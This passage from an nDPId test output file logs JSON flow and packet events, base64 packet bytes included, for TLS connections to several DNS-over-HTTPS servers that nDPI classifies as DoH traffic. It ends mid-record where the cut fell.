00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739374011,"flow_last_seen":946739374011,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739374011,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":946739374011,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739374011,"pkt":"REREREREZmZmZmZmCABFAAFF9DpAAH4GIdcKAAABdMqwGqhiAbtWR3H7NJTy0VAYAfbm2AAAFgMBARgBAAEUAwO\/FCTCx\/QYlyW+S6EGE0TFYQ1H3k3FO+5pvJMM4NWMBSCY7MF+HV8NsAFc82xlqHj0YcQW9bewwKxZQwscQJJKpgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmxpYnJlZG5zLmdyAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIOxloY7MOWvSgZ3hQaojp9inJ84Sw+igf7hW9Y3pU+ch"}
00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739374011,"flow_last_seen":946739374011,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739374011,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":946739374036,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3179,"pkt_l4_len":3145,"thread_ts_msec":946739374036,"pkt":"ZmZmZmZmRERERERECABFAAxdEw5AADYGP+x0yrAaCgAAAQG7qGI0lPLRVkdzGFAYAfXx8AAAFgMDAHoCAAB2AwMfdsQbzuiYRNDg0SBjCCwcHmnTX\/WaALeQBUBykWdcaiCY7MF+HV8NsAFc82xlqHj0YcQW9bewwKxZQwscQJJKphMCAAAuACsAAgMEADMAJAAdACCFS52dOnPWMZ+6KGOu9y\/QLNkNywSlNldrBcP9ygUsJBQDAwABARcDAwAkRYbUEe0KLtMYBo7DwIYWcyipqqBN\/bxVehyh0Sw6cb936jKFFwMDChoofwyGB1vpwXv7Xn4hXSbG1vtIeMernYPn5eAfJWckDiE1Vl5RxqW26TSWUTfmtG\/80SN\/HcC8sF8BZiFAAmCY47UJ7uXvVoDqw8BmwUzQhTAJ8CR9FaoGVeJsM5UnR3QsIEHqP5KqlB9iD+UdFFEShzmfIEBTbyB2lP4pQWBOWz2wOPIXZhQnKMJCxu1mnXifSB+KRolJ9fD2dQ4Cx5+85+F56fGG9StYfwFmGPIeJARJjwh49nZDI4iYWv+ddPBM2\/KJRuF+1TvTRam5R+I0m2+MFl1IOG\/mGs22lUpFRiEafHau8IgYwLtIsVJVRXeEF23eSSLjZSGlI+95kanzpb7Gq+bxaPB\/4KE\/EZB\/HHORaklfdEzQyROMT29wGcN987isDVey45rLfbLMKOZqZTAfIY9fCmEJfoMGXsfxScuGJL3kk9ktG5XOrDaDe+Mw8iBMs6aCgsJWCKp9AlmnI6jM+Pkj5pJEm1bom4ksHEDAz1NZ0ftN\/sVLZn9Ug2C7F7lT1GzkA6PKlKc6EZ2z5CZ6jJ2Z6Y6MlAZziPoOQu4qTh3J+nE8GcgGOJ+4zh9BbyrU\/zs1GjsbXVkHAo7jDaYOsfbK6OwpKfl4fhdC60RX1KjskIAX35OHA\/IXKzAnkgHHInCPGyjRoDeCN\/xxIMzVFrKXTCwf2SPOaQSeCd\/JvCgSVj\/dHhq8zdYnlFf+z9VXpf9xqp8dTGqqOXUGFnDAdjBQ71FnqfI6ubmeRFAjPpvyUbaEAnejXwHU9g6Nb1kInR39UeMaOlkv2XbX4eVVedQBnQ80TEebS+RYgvF4z+JaZdzTDBKsiCrr90MrJqELQ15ruqB7RM0T7bzUmBAp55RHbt\/ccY\/TkG\/gVsixMDlDFkIhMYt9MdUi87PoFTfnAamhlvAw7oZO8\/F7iHmtBa\/Ep7E0DP9U5QDAi98hWmChSAXTUreygTLQuqQnUJmosGexWw5Cm8TG3r4N5gnkEVB3HVNF0Bviuw4E\/LgbkZLCP6\/4igcruIsBRgEN00dS6JnGlucNL86jMmrPxWv6fGd6uX4GyIhA8xlh3VmZmkdtEaBCAvedT6MuQU0ug0OS0vhYWi4hpFSwBYkEc7nVVyMbvGRC\/t6cdur00RqtQCHbN+NyMsAYQCMLcN\/MBgJi53gtKoOeVRxL9efr0oSMfPFjg62k6KC1lR+0S5m3Izs0xuBIpZ4qwdqzDBYxqETxd2mAw6qyV9\/+c2vTZTjQfcpnp7y1uBxTcCkKvdXtnytMj88r6V3CNsrCqoiP+HgdZ35NIzfdjE8dt6Do9yQiQH9DyOtUx8mNKBWoW2GsDQem5ZGAtDwjmFRhkWEqvnuAWeKZRQvsxDNQX1VGCheiYk47AXsweypHM0kF7Sz+NMdgmJ2lYhFlZ1\/ixGlfZSk6mjv0hogoEvvV0z6\/T5ayYUiYrSxxE5CRTBXiQ0ShTnl8JnNrX5f1+PEHiTs9VmgpKgcqyhnAx43FvFz+tjAq2kHUpARsisN76U\/4szTnIzPWHuhFJGJXIYtA6KvZZsRr8X45Bjm7782fphZHssP9T11fz+rMBuNZkB+9kENQs834qUDrDWQYlgtgokMydJHahHIc4rs8RwpnWkwnfbjQyRwpkoSDjqKCsoWgqmckVcAlWtfj+PYNdYUV0GJVz3MaCILZ2I6i8QDOlFT6AvpNPYOGoGbJ0wKc\/iRHcSqwHkLOlqAj9rNOane\/dG8vbDHghfqFdeNPvQAcyGldxWfqiN032Vix7+oZXOFXeLNRXDRdMWbSqMlyCprTcKldxAe+jYGRK\/SRNNln4bS6loI5LqK5kRj1qHOQs4VYAvb6aRZkpJmFfA051r9ZTveZwX8QvPcsUhSp6WJroM5RdVgMoZWRw3V3kLzy526l\/XjarCqs7b9zg4\/0UThyCoRZXRIaapKAxcisr606oQ90EO6V1\/rxbH5QoNdmuIBJXUiCC+vi9DaFQhw7IS7rYl6bCaQkE1gKVqVjcfGFNbkwZ6WVIIFLAd4AULNZ0EbDr3Jxz4Q1Kv61lNl9GOAmC73UocSHTqPhV\/xb9YLlv4Qj8A9VyOXsI3ysVAT7Q3JqQoSzzANJennQVJORrvCGjBFhIJA1XuVUswlY7d8l6GIPFEndkzdJv+mqLebs92Ve7y8gHX+5\/N3bWQDbvROspZd9Rw2VYwhVeRkdNNkB9Zd4yf0MJA6FKQTPIvZ1j4Zvrf8Zqj1FK4+Pu5YWK2VzQ1bAzEZ5TAhqXro79v42FstXXH9Bjh6xGWnYs4EgdjNtrw9q9vDDHzkCgGXErTBS5tZpn4eq4iayRQKOUo2Bjzuikc3GCcT7DGLOzNijLOjpstykBtjYEBagL1lzeuQbGqMxLzwOzMZiM6Cr4dH6Ct7enfPKr1l7EDqLb80TAVFsE6E9zPStbSvvDsesVjI0LnHLpiFF3QD7w\/cMgXGCCQFz4kjOyjxN1ueQ3BiQwzUZI\/KQVjymbQQOaDcU\/hamroqvDR3psu8zkzqDRgXxZpAhYSs0ypnNhUomh4K+raYSufO72xoIxT3MchbmB2xOG+FHTInGWwMp665VQ8P5TZyqYPfZdJpda3UJ4l4i+8AGeTKq9cySdx4swdISz3V3xxrTEFxvjq7CgCc0mdfHRwUrslFZ\/8xz\/GkZ7unKM4nUXsR2wjAWglEejYWAjwBH57asssV4a1smVbgfitfljZxOQxeCULZkhU5iCbDWtt61dkKbIg6Z5Ib6wqsZbKsTNF5BUW\/OluqVhEnnxYi4bC2p8oeMOIg9Xp0ohk+2eyHzNnL7PsT\/0TJd+8z\/6rR4GfsNhau8JwG0sVxaM3gQ\/C1BUi59C0tclt8uqB8v4sL+nw1kYxtxvVF+WgZBhsUG6jtsTkz\/h7Vqr1uE1yqk6VMywMNzSK3C6Y5jNYNZlGRunhyx+Wvqoy4kyzKlb5KJu0D6Ibb9tx4jkjfsAgRv1kb1\/YV+5pR9kOWTI7kTR0GhRhEcYVSuszO6GztHF17jUv1HGqvUE2Y1nYTruioVBGxNU2n\/3D8R0H0Ev+WM\/lE1CkAFwkkBnRPnHTXpqQgZZhPNhQeacIL4PiCwXLGj68pqU9sBR5k+Qs1xeKaXL1uB\/+DlBrxDF37H0xYTjNyCifmppE9xs8wUURoGCYQz8YrJzWYbNTp6iS3VA9PqxHbxpwe+T0EJG3w+ckQ4AZZWQJfpeYEAjUJVTV+JzyForU6vnGB\/f4UtM5hkLlLR2yX4QW5z2sMH+oemvxHSO3c4dMYOamZjpEAr8HZR\/eYtA\/+k47KLbbuC8LadTWp9kx60hq9j0ZTOjnZRbmpU7x4+baRS3lSZ4uCKQhRDRs1bz+OmCsokrpdBvyRNmpmdHu7+xcAAbWr3GDiMDDj2MeLocIu6VxMJmWwaV6i6S3OZRKsCOQTd0Jkp8jCBeqO4YH7rnKVrcOwj8x\/xgYsXAwMBGfgS0Z5JTGD28Vyg2LfJHOWz9mr0ZY69GFX94xRplNLJ90YhSqkDA41SrPaRCa\/yRHZpmo6Z1mQO81cAsIuYw3\/dzrRByb+dTIlW9yt\/sOP7usPp6PbdD4rTPrbEK4QR\/+wMzHeanap2HaJcY2tnK9Pk6wr3URSABWoCiW8bBJ44gM\/wYSxUIN9fZQXNHmUFX2+4E+pzfHMX+TPSUHrGMWaQGF+jm8f8JzgtBamlKFf0T7ESBzmOVDFYKLq5HkwIpwu7FecWONEwB4QKksZp77Ks7VMI9z7kgYi8fKP1AlrK0wJXYhtL9bgNIor7UcK\/cBVJ2AclPTcIWxPGf\/H2qC2ccHzN2oQA1YRLpy6QS\/qocCCtoi9irrhlFwMDAEUNWvqMs\/h03WKKdBMbYkawhmSS9CnEEwNmSHsUo0aFsC+NuRuOS7d+gyt4adOBPfCXNUuX7r\/jeMTBHE2RkzGNnd\/d06g="}
00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739374011,"flow_last_seen":946739374036,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":3410,"flow_avg_l4_payload_len":1705,"midstream":1,"thread_ts_msec":946739374036,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":946739374036,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739374036,"pkt":"REREREREZmZmZmZmCABFAAB49DxAAH4GIqIKAAABdMqwGqhiAbtWR3MYNJT\/BlAYAfXmCwAAFAMDAAEBFwMDAEUX9381c\/+R1qgydby2LZz\/D1isDmITv8iB3tIfcLl3X1ZN85j+RzDG7ZR0PP5I0SioKkHY5OtmjMfBNJaLny9tLOB5RTM="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378281,"flow_last_seen":946739378281,"flow_idle_time":7440000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739378281,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00853{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":946739378281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":344,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":344,"pkt_l4_len":310,"thread_ts_msec":946739378281,"pkt":"REREREREZmZmZmZmCABFAAFK6MRAAH4Gn0EKAAABVQVd5uaSAbv2ZmEwaR3\/oVAYAfZ05AAAFgMBAR0BAAEZAwPCcBaP\/DC8hVoTSokbsQvpjhaLnYrt7eKsiMQ8EXb5AyAAGOihE6CuqcDNXckkTdE7CmzbbGzUcC6GWkBVFb5CcQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACqAAAAGQAXAAAUaWJrc3R1cm0uc3lub2xvZ3kubWUABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg6FKiZGfISPafy0Na34RI3z\/9T8Zo5Ona0mhcVKXwyTI="}
00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378281,"flow_last_seen":946739378281,"flow_idle_time":7440000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739378281,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":946739378310,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":153,"pkt_l4_len":119,"thread_ts_msec":946739378310,"pkt":"ZmZmZmZmRERERERECABFAACL5iJAADQG7KJVBV3mCgAAAQG75pJpHf+h9mZiUlAYAFOUtgAAFgMDAFgCAABUAwPPIa105ZphEb4djAIeZbiRwqIRFnq7jF4HngniyKgznCAAGOihE6CuqcDNXckkTdE7CmzbbGzUcC6GWkBVFb5CcRMCAAAMACsAAgMEADMAAgAZFAMDAAEB"}
00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":304,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378281,"flow_last_seen":946739378310,"flow_idle_time":7440000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":946739378310,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":946739378311,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":946739378311,"pkt":"REREREREZmZmZmZmCABFAAAu6MZAAH4GoFsKAAABVQVd5uaSAbv2ZmJSaR4ABFAYAfZzyAAAFAMDAAEB"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378577,"flow_last_seen":946739378577,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739378577,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":946739378577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739378577,"pkt":"REREREREZmZmZmZmCABFAAFDLylAAH4Gh5EKAAABaBwcIoO8AbvZKqUSoyMYWVAYAfZGMAAAFgMBARYBAAESAwNktN1XF4bqrby0niN\/MgT4p6NPXKBlRwOJCoza94pvXyD9DZHEPvQMzjP6pbu5TmyGbnG5vDXlt6MJFI6XifT24wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANanAudGlhcmFwLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBNe3CKgugpSU\/ahaeKXUN1ypv0O\/7wv4rJDS1FbyCQKA=="}
00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378577,"flow_last_seen":946739378577,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739378577,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
03848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":946739378607,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2557,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2557,"pkt_l4_len":2523,"thread_ts_msec":946739378607,"pkt":"ZmZmZmZmRERERERECABFAAnv8ehAADcGAyZoHBwiCgAAAQG7g7yjIxhZ2SqmLVAYAEJO3AAAFgMDAHoCAAB2AwM5\/Tpf+0rVAVLiqp3AKzeP0oc5LUJ7LbPa16oj3TgNDiD9DZHEPvQMzjP6pbu5TmyGbnG5vDXlt6MJFI6XifT24xMBAAAuADMAJAAdACC6HV5GLKVmM89uM3s2SIWu43Lfyhq5unw8YJ6WUfrNYwArAAIDBBQDAwABARcDAwk9PLTYD+JT2QAppt0TUbAwAmxAstQCMsQy32ww9oSEEAAMGSMNt+TTdp0V3tZ3ctmeFKC8drVcJHMoKPW\/gLMtyIUmD\/3+eYMhUKtI+3FRz671m\/FiCxQ+DYhEAA2djrJV7bAD8riXyaqFyW2aaJF84flOMuq9DLwOUI0IypM1HnMNVT7vNmCordbJ4vYfoJCHZ3Jdxa1PMxflxUdqb7t2xbf5y\/m1Lgj+QBUEN2VGq3ZK1ktt1GgLlt5OMY6q\/EMncuhg\/OHccuz87CSxEURWL2O5XG3NQ8ZSkyDIF1XtrmR6FGXAhlzN0GIMFD4mIZ5QqyhyGprKsDD36CWqaTOR27WUIRMeWgua2kpjr+elVVRiIT0yfyvShMeR5KvvMj5AG9M4S4\/qWWxJjIv9qLfYm7RWSC4r34hNlFnFlqsqqqzzh\/BxMvV1bwxfAaqA1qBideWKRVA+7EuN95c4ue7X\/hRVHEx3iQLqTqKG9s8vcXeE42KLZOgVl3B7xu8\/i92\/WkhbHAp1VaoXVrJw6GLiISb\/po8DiOQt5NIdGX5eDQSEZ7O9baKasLWzq1YkwfZijF3n9KVs9qv2KSy5IfvS0SD4T0T96JowaLvO1lvBNbG7CindkMAn7au9+n1sxBnSgPOEhxjP6eP7I9klViNjl15nUFM6o4r0CQuVxRwVYjFh10tMhUtqr5ufjJtftBeIT7Z6ffMsMrzPdyzkIvDM+swGXo7V35YzVo8DyoBYe9uM0JJnrorf04OKftnG+pjuV1J118k\/TcF7dgWMascYwrYulqMRqr3vNGGbqZxylwmKp462M5UtGuo+qerBWSrRXWS6eh\/Pd34MrDX1VmvCOR23Z07RB6KZ9U0a03sYPKhsU\/m8X7Y3lJg3mFbu5qAjYzD1O+cD4Myf40iIoCP9xcs4bu1pUmgjVbsp3ut86GCDAgM+2h3m+dYO91dTNrC6JdnpsdKfoGqobbC1Nd6P0Kznfd6xn\/BQDvXNQHfd3IPzPYj2FRyDUuFDyWgT\/cwlGc7O60WUydzXXvs9ttqI8TuCUJYd1Ao8xx8mAgIvrwtyiwJR5QZQxYq0NnVo97JO1hRxuXJb+LTsywktm+cb6647KFCAIE22xi+EiXjOKZOlKgY\/++l2PKcbQh7+iHITgTYo09PyNcnTJxUwLKCZUcpj08uHLE+si9w6kmA+pKFDGKHD2OQi0\/dVl+2FqCH2+A3DCa2Gg9EWzElOrJ9mp3PsOzxGAh1T1616sYT0her6SVuXlhCGP0slwtRkTfN5tnJIo22tEgWtQ+b6y1PTsvRTouR9DpgUBw8BD3g0lRYqf3KAJIjUNpSvsRMGe0P3S4KCcJTz19EnjfZoP6uX+a1+4rjk2AihvF76LGF5wO7bsnmmIDYTvndhSZUKAm3a49yHTGG7gVwYkqmq0TRbx3kmFRXEBuvlULDIz+RlQyLwuJX5uRyHubvUf803FCAz\/4a9pnE6WEDc+zOoXHErWhAfoc5tjJI1gMxGX8U3yJwrwEtij2gQTn0Bbv4+6DXg8iV1mRetvz2V395BS+h9qVm0PJky45RjI5FxKVNW8VUHbBkrW32Ln2Pm3mojmUt+Xsx7zInkOkVoS97LxHGe13JTpikDPPGgpjpEoHIcQRKqtRb0XznaWZx01cfmn3isfcOxCOvXJUXQwHOBr0ZOeVU8JyV5j86F3c2x16THC9pMZadmbjMRbWkSLTw4DMHNpPKhS6WbcQJhxPZwfAVbKEjktlF0JguUnWmRyDWlD919TvF+XWK\/xSop+ME26vjlWYdWryJvX71XiN34ciEg6jsS9BSYdT6j+C8MLHQApTVrKIlUjg7LizXHOZ\/8TbPIjDL1MmbwanCPsnz+x51R4gaxLum0nLoSL+ZmdQWjq\/uyo2YE03WUuDCwEqP451PgmdaqLRPfWLB1DwCAkXZchOxevuMOjyvWV6dC+e+ksCIkxwJmTgcBQXwfuBwje22m5Cj2nv\/zq4aMsV7kiFOS1VcPYLEbw+c4UolvdLrBBCbMxCQZeGhjAzGdsZDuX\/6sRIGIbuHAE8nIh+KJ0joM4KoZNtLXSA2HqbNN+kRQ5gTFmAp4mqAOgsHxAv6V1xCZg8P3MEffeog7NEB4\/K8wtwtgVyjvZaZ4E5jbN5Fjj\/jqK88SEXhkPYnN+on2bA\/r\/BMBIaoCajkogUyGLoyIPMT+pBrWa+wfZKdLurwPxZw+jCxKJC0\/mmFBL81N3ktV2QA+uWulN8QPCd7cD0\/Hjf2QklIJga5shMEJkHY6px3Tk68O3abNmIreZ6S\/N71agsTVbVTSaRlprW4p5D79LYThW+q2zikyKF2eG4VtVQ1Z087sY8sCBmmZG8ETPN5Xq0TN3Q1mXCkwjS9y4DvkEf4d2VKsFN6yj110+kONDzC8lVgKicr46oqIhZ9cyUDwr5+MuFqHiF2KMvJx9XA7v9+a265RIEavlSRTRm3PXbeYNOWUADrJWXjguUacdKmikyCoiD9vRp7ll6YxsV5jSfRT\/9SmZeNE+aTDy2wakB7qY1oeeLE4kVchDyQa22zUAtVHOgOvTZInJYA\/takDFgegJnQaYWISVIejbCOHLLvY\/LGAj1CyqRrh1\/LJm06TJxFQn5cMNb5SSEJFNyxF75PSPT288zWx2Va0aIhDIB+vku9QlaiV4ac8CwDTFNaqbQKECa5ibv22eB002L0jyDWacUoUluFvwofh+CTE377hEPfvjsRjX+V3P\/erPya8F4fW7JQkFJgCrTK1VaoDF64ZvLzNQJ5aCIC3Js6D+sD6g4jOpLHGy2zHMlk9wTN+yBybuSBsrJL9uS5j3JgQRC167kARpn8\/3wkN3\/lvlFPoVYVhj99l\/NeW6y\/YdomeNnyw0D7qas3wz1t0EQFticUf9LLfRMzRHEf20AYOoy9Fonct0XWUb6fLDU7CQJTqCHU8Eiy+rgD2t\/dxE4NlpfZ2ZSbDZ7QWFdftipHKlR4nJqLL0sU6kjZ8SydsZ8oAinHCIV9v5PNYgUBa8WbGYb2kgxJMSN3jbYzsoGwAsbdeAghc0S7LurZvISJXwa0jBqUzUHZmweZXCdDnfDiPc92KCXG9hA13VfXTouQnTd0zyBwPxIcvLGDhAu1CCSmBlGZrOEjmOi1\/i4ug\/A=="}
00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":326,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378577,"flow_last_seen":946739378607,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":2786,"flow_avg_l4_payload_len":1393,"midstream":1,"thread_ts_msec":946739378607,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 